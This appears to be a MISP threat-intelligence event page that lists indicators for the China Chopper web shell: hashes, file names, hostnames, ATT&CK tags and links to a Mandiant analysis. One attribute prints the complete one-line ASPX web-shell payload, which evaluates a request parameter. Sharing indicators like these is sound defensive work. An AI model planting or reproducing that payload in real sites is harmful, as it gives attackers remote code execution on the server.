APT 41 Scraper: Breaking Down the China Chopper Web Shell – Part I

Event ID: 1538
UUID: 4c885688-92fe-4498-be89-69aa6bdcc5eb
Creator org: CUDESO
Owner org: LUNCHBOX
Creator user: admin@admin.test
Protected Event (experimental): event is in unprotected mode
Tags: misp:tool="misp-scraper", osint:source-type="blog-post", misp:event-type="collection", workflow:state="complete", tlp:white
Date: 2013-08-07
Threat Level: Medium
Analysis: Completed
Distribution: All communities
Published: Yes (2022-09-21 19:38:25)
Attributes: 15 (4 Objects)
First recorded change: 2022-09-12 20:55:18
Last change: 2022-09-12 20:55:18
Sightings: 0 (0) – restricted to own organisation only

Warning: potential false positives (warninglist hit): Top 10K most-used sites from Tranco



Galaxies

attck4fraud
  • Malware

Enterprise Attack – Malware
  • China Chopper – S0020

Sector
  • Other

Target Information
  • China

Ransomware
  • Explorer

Attack Pattern
  • Web Shell – T1505.003


Attributes

Date | Object | Category | Type | Value | Comment | Distribution | Sightings
2022-09-21 | – | Artifacts dropped | text | <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%> | text-based payload ASPX | Inherit | (0/0/0)
2022-09-21 | – | Payload delivery | link | http://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html | – | Inherit | (0/0/0)
2022-09-21 | file (1, references: Web shell) | Payload delivery | md5 | 5001ef50c7e869253a7c152a638eab8a | – | Inherit | (0/0/0)
2022-09-21 | file (1, references: Web shell) | Payload delivery | filename | caidao.exe | – | Inherit | (0/0/0)
2022-09-21 | file (2) | Payload delivery | md5 | 8aa603ee2454da64f4c70f24cc0b5e08 | – | Inherit | (0/0/0)
2022-09-21 | file (2) | Payload delivery | filename | Customize.aspx | – | Inherit | (0/0/0)
2022-09-21 | file (3) | Payload delivery | md5 | ad8288227240477a95fb023551773c84 | – | Inherit | (0/0/0)
2022-09-21 | file (3) | Payload delivery | filename | Customize.cfm | – | Inherit | (0/0/0)
2022-09-21 | file (4) | Payload delivery | md5 | acba8115d027529763ea5c7ed6621499 | – | Inherit | (0/0/0)
2022-09-21 | file (4) | Payload delivery | filename | Customize.jsp | – | Inherit | (0/0/0)
2022-09-21 | – | Payload delivery | filename | 5001ef50c7e869253a7c152a638eab8a.exe | – | Inherit | (0/0/0)
2022-09-21 | – | Payload delivery | hostname | www.maicaidao.com | – | Inherit | (0/0/0)
2022-09-21 | – | Other | comment | Breaking Down the China Chopper Web Shell – Part I | Blog title | Inherit | (0/0/0)
2022-09-21 | – | External analysis | link | https://www.mandiant.com/resources/blog/breaking-down-china-chopper-web-shell-part-i | Blog URL | Inherit | (0/0/0)
2022-09-12 | – | Network activity | hostname | www.google.com.hk | – | Inherit | (0/0/0)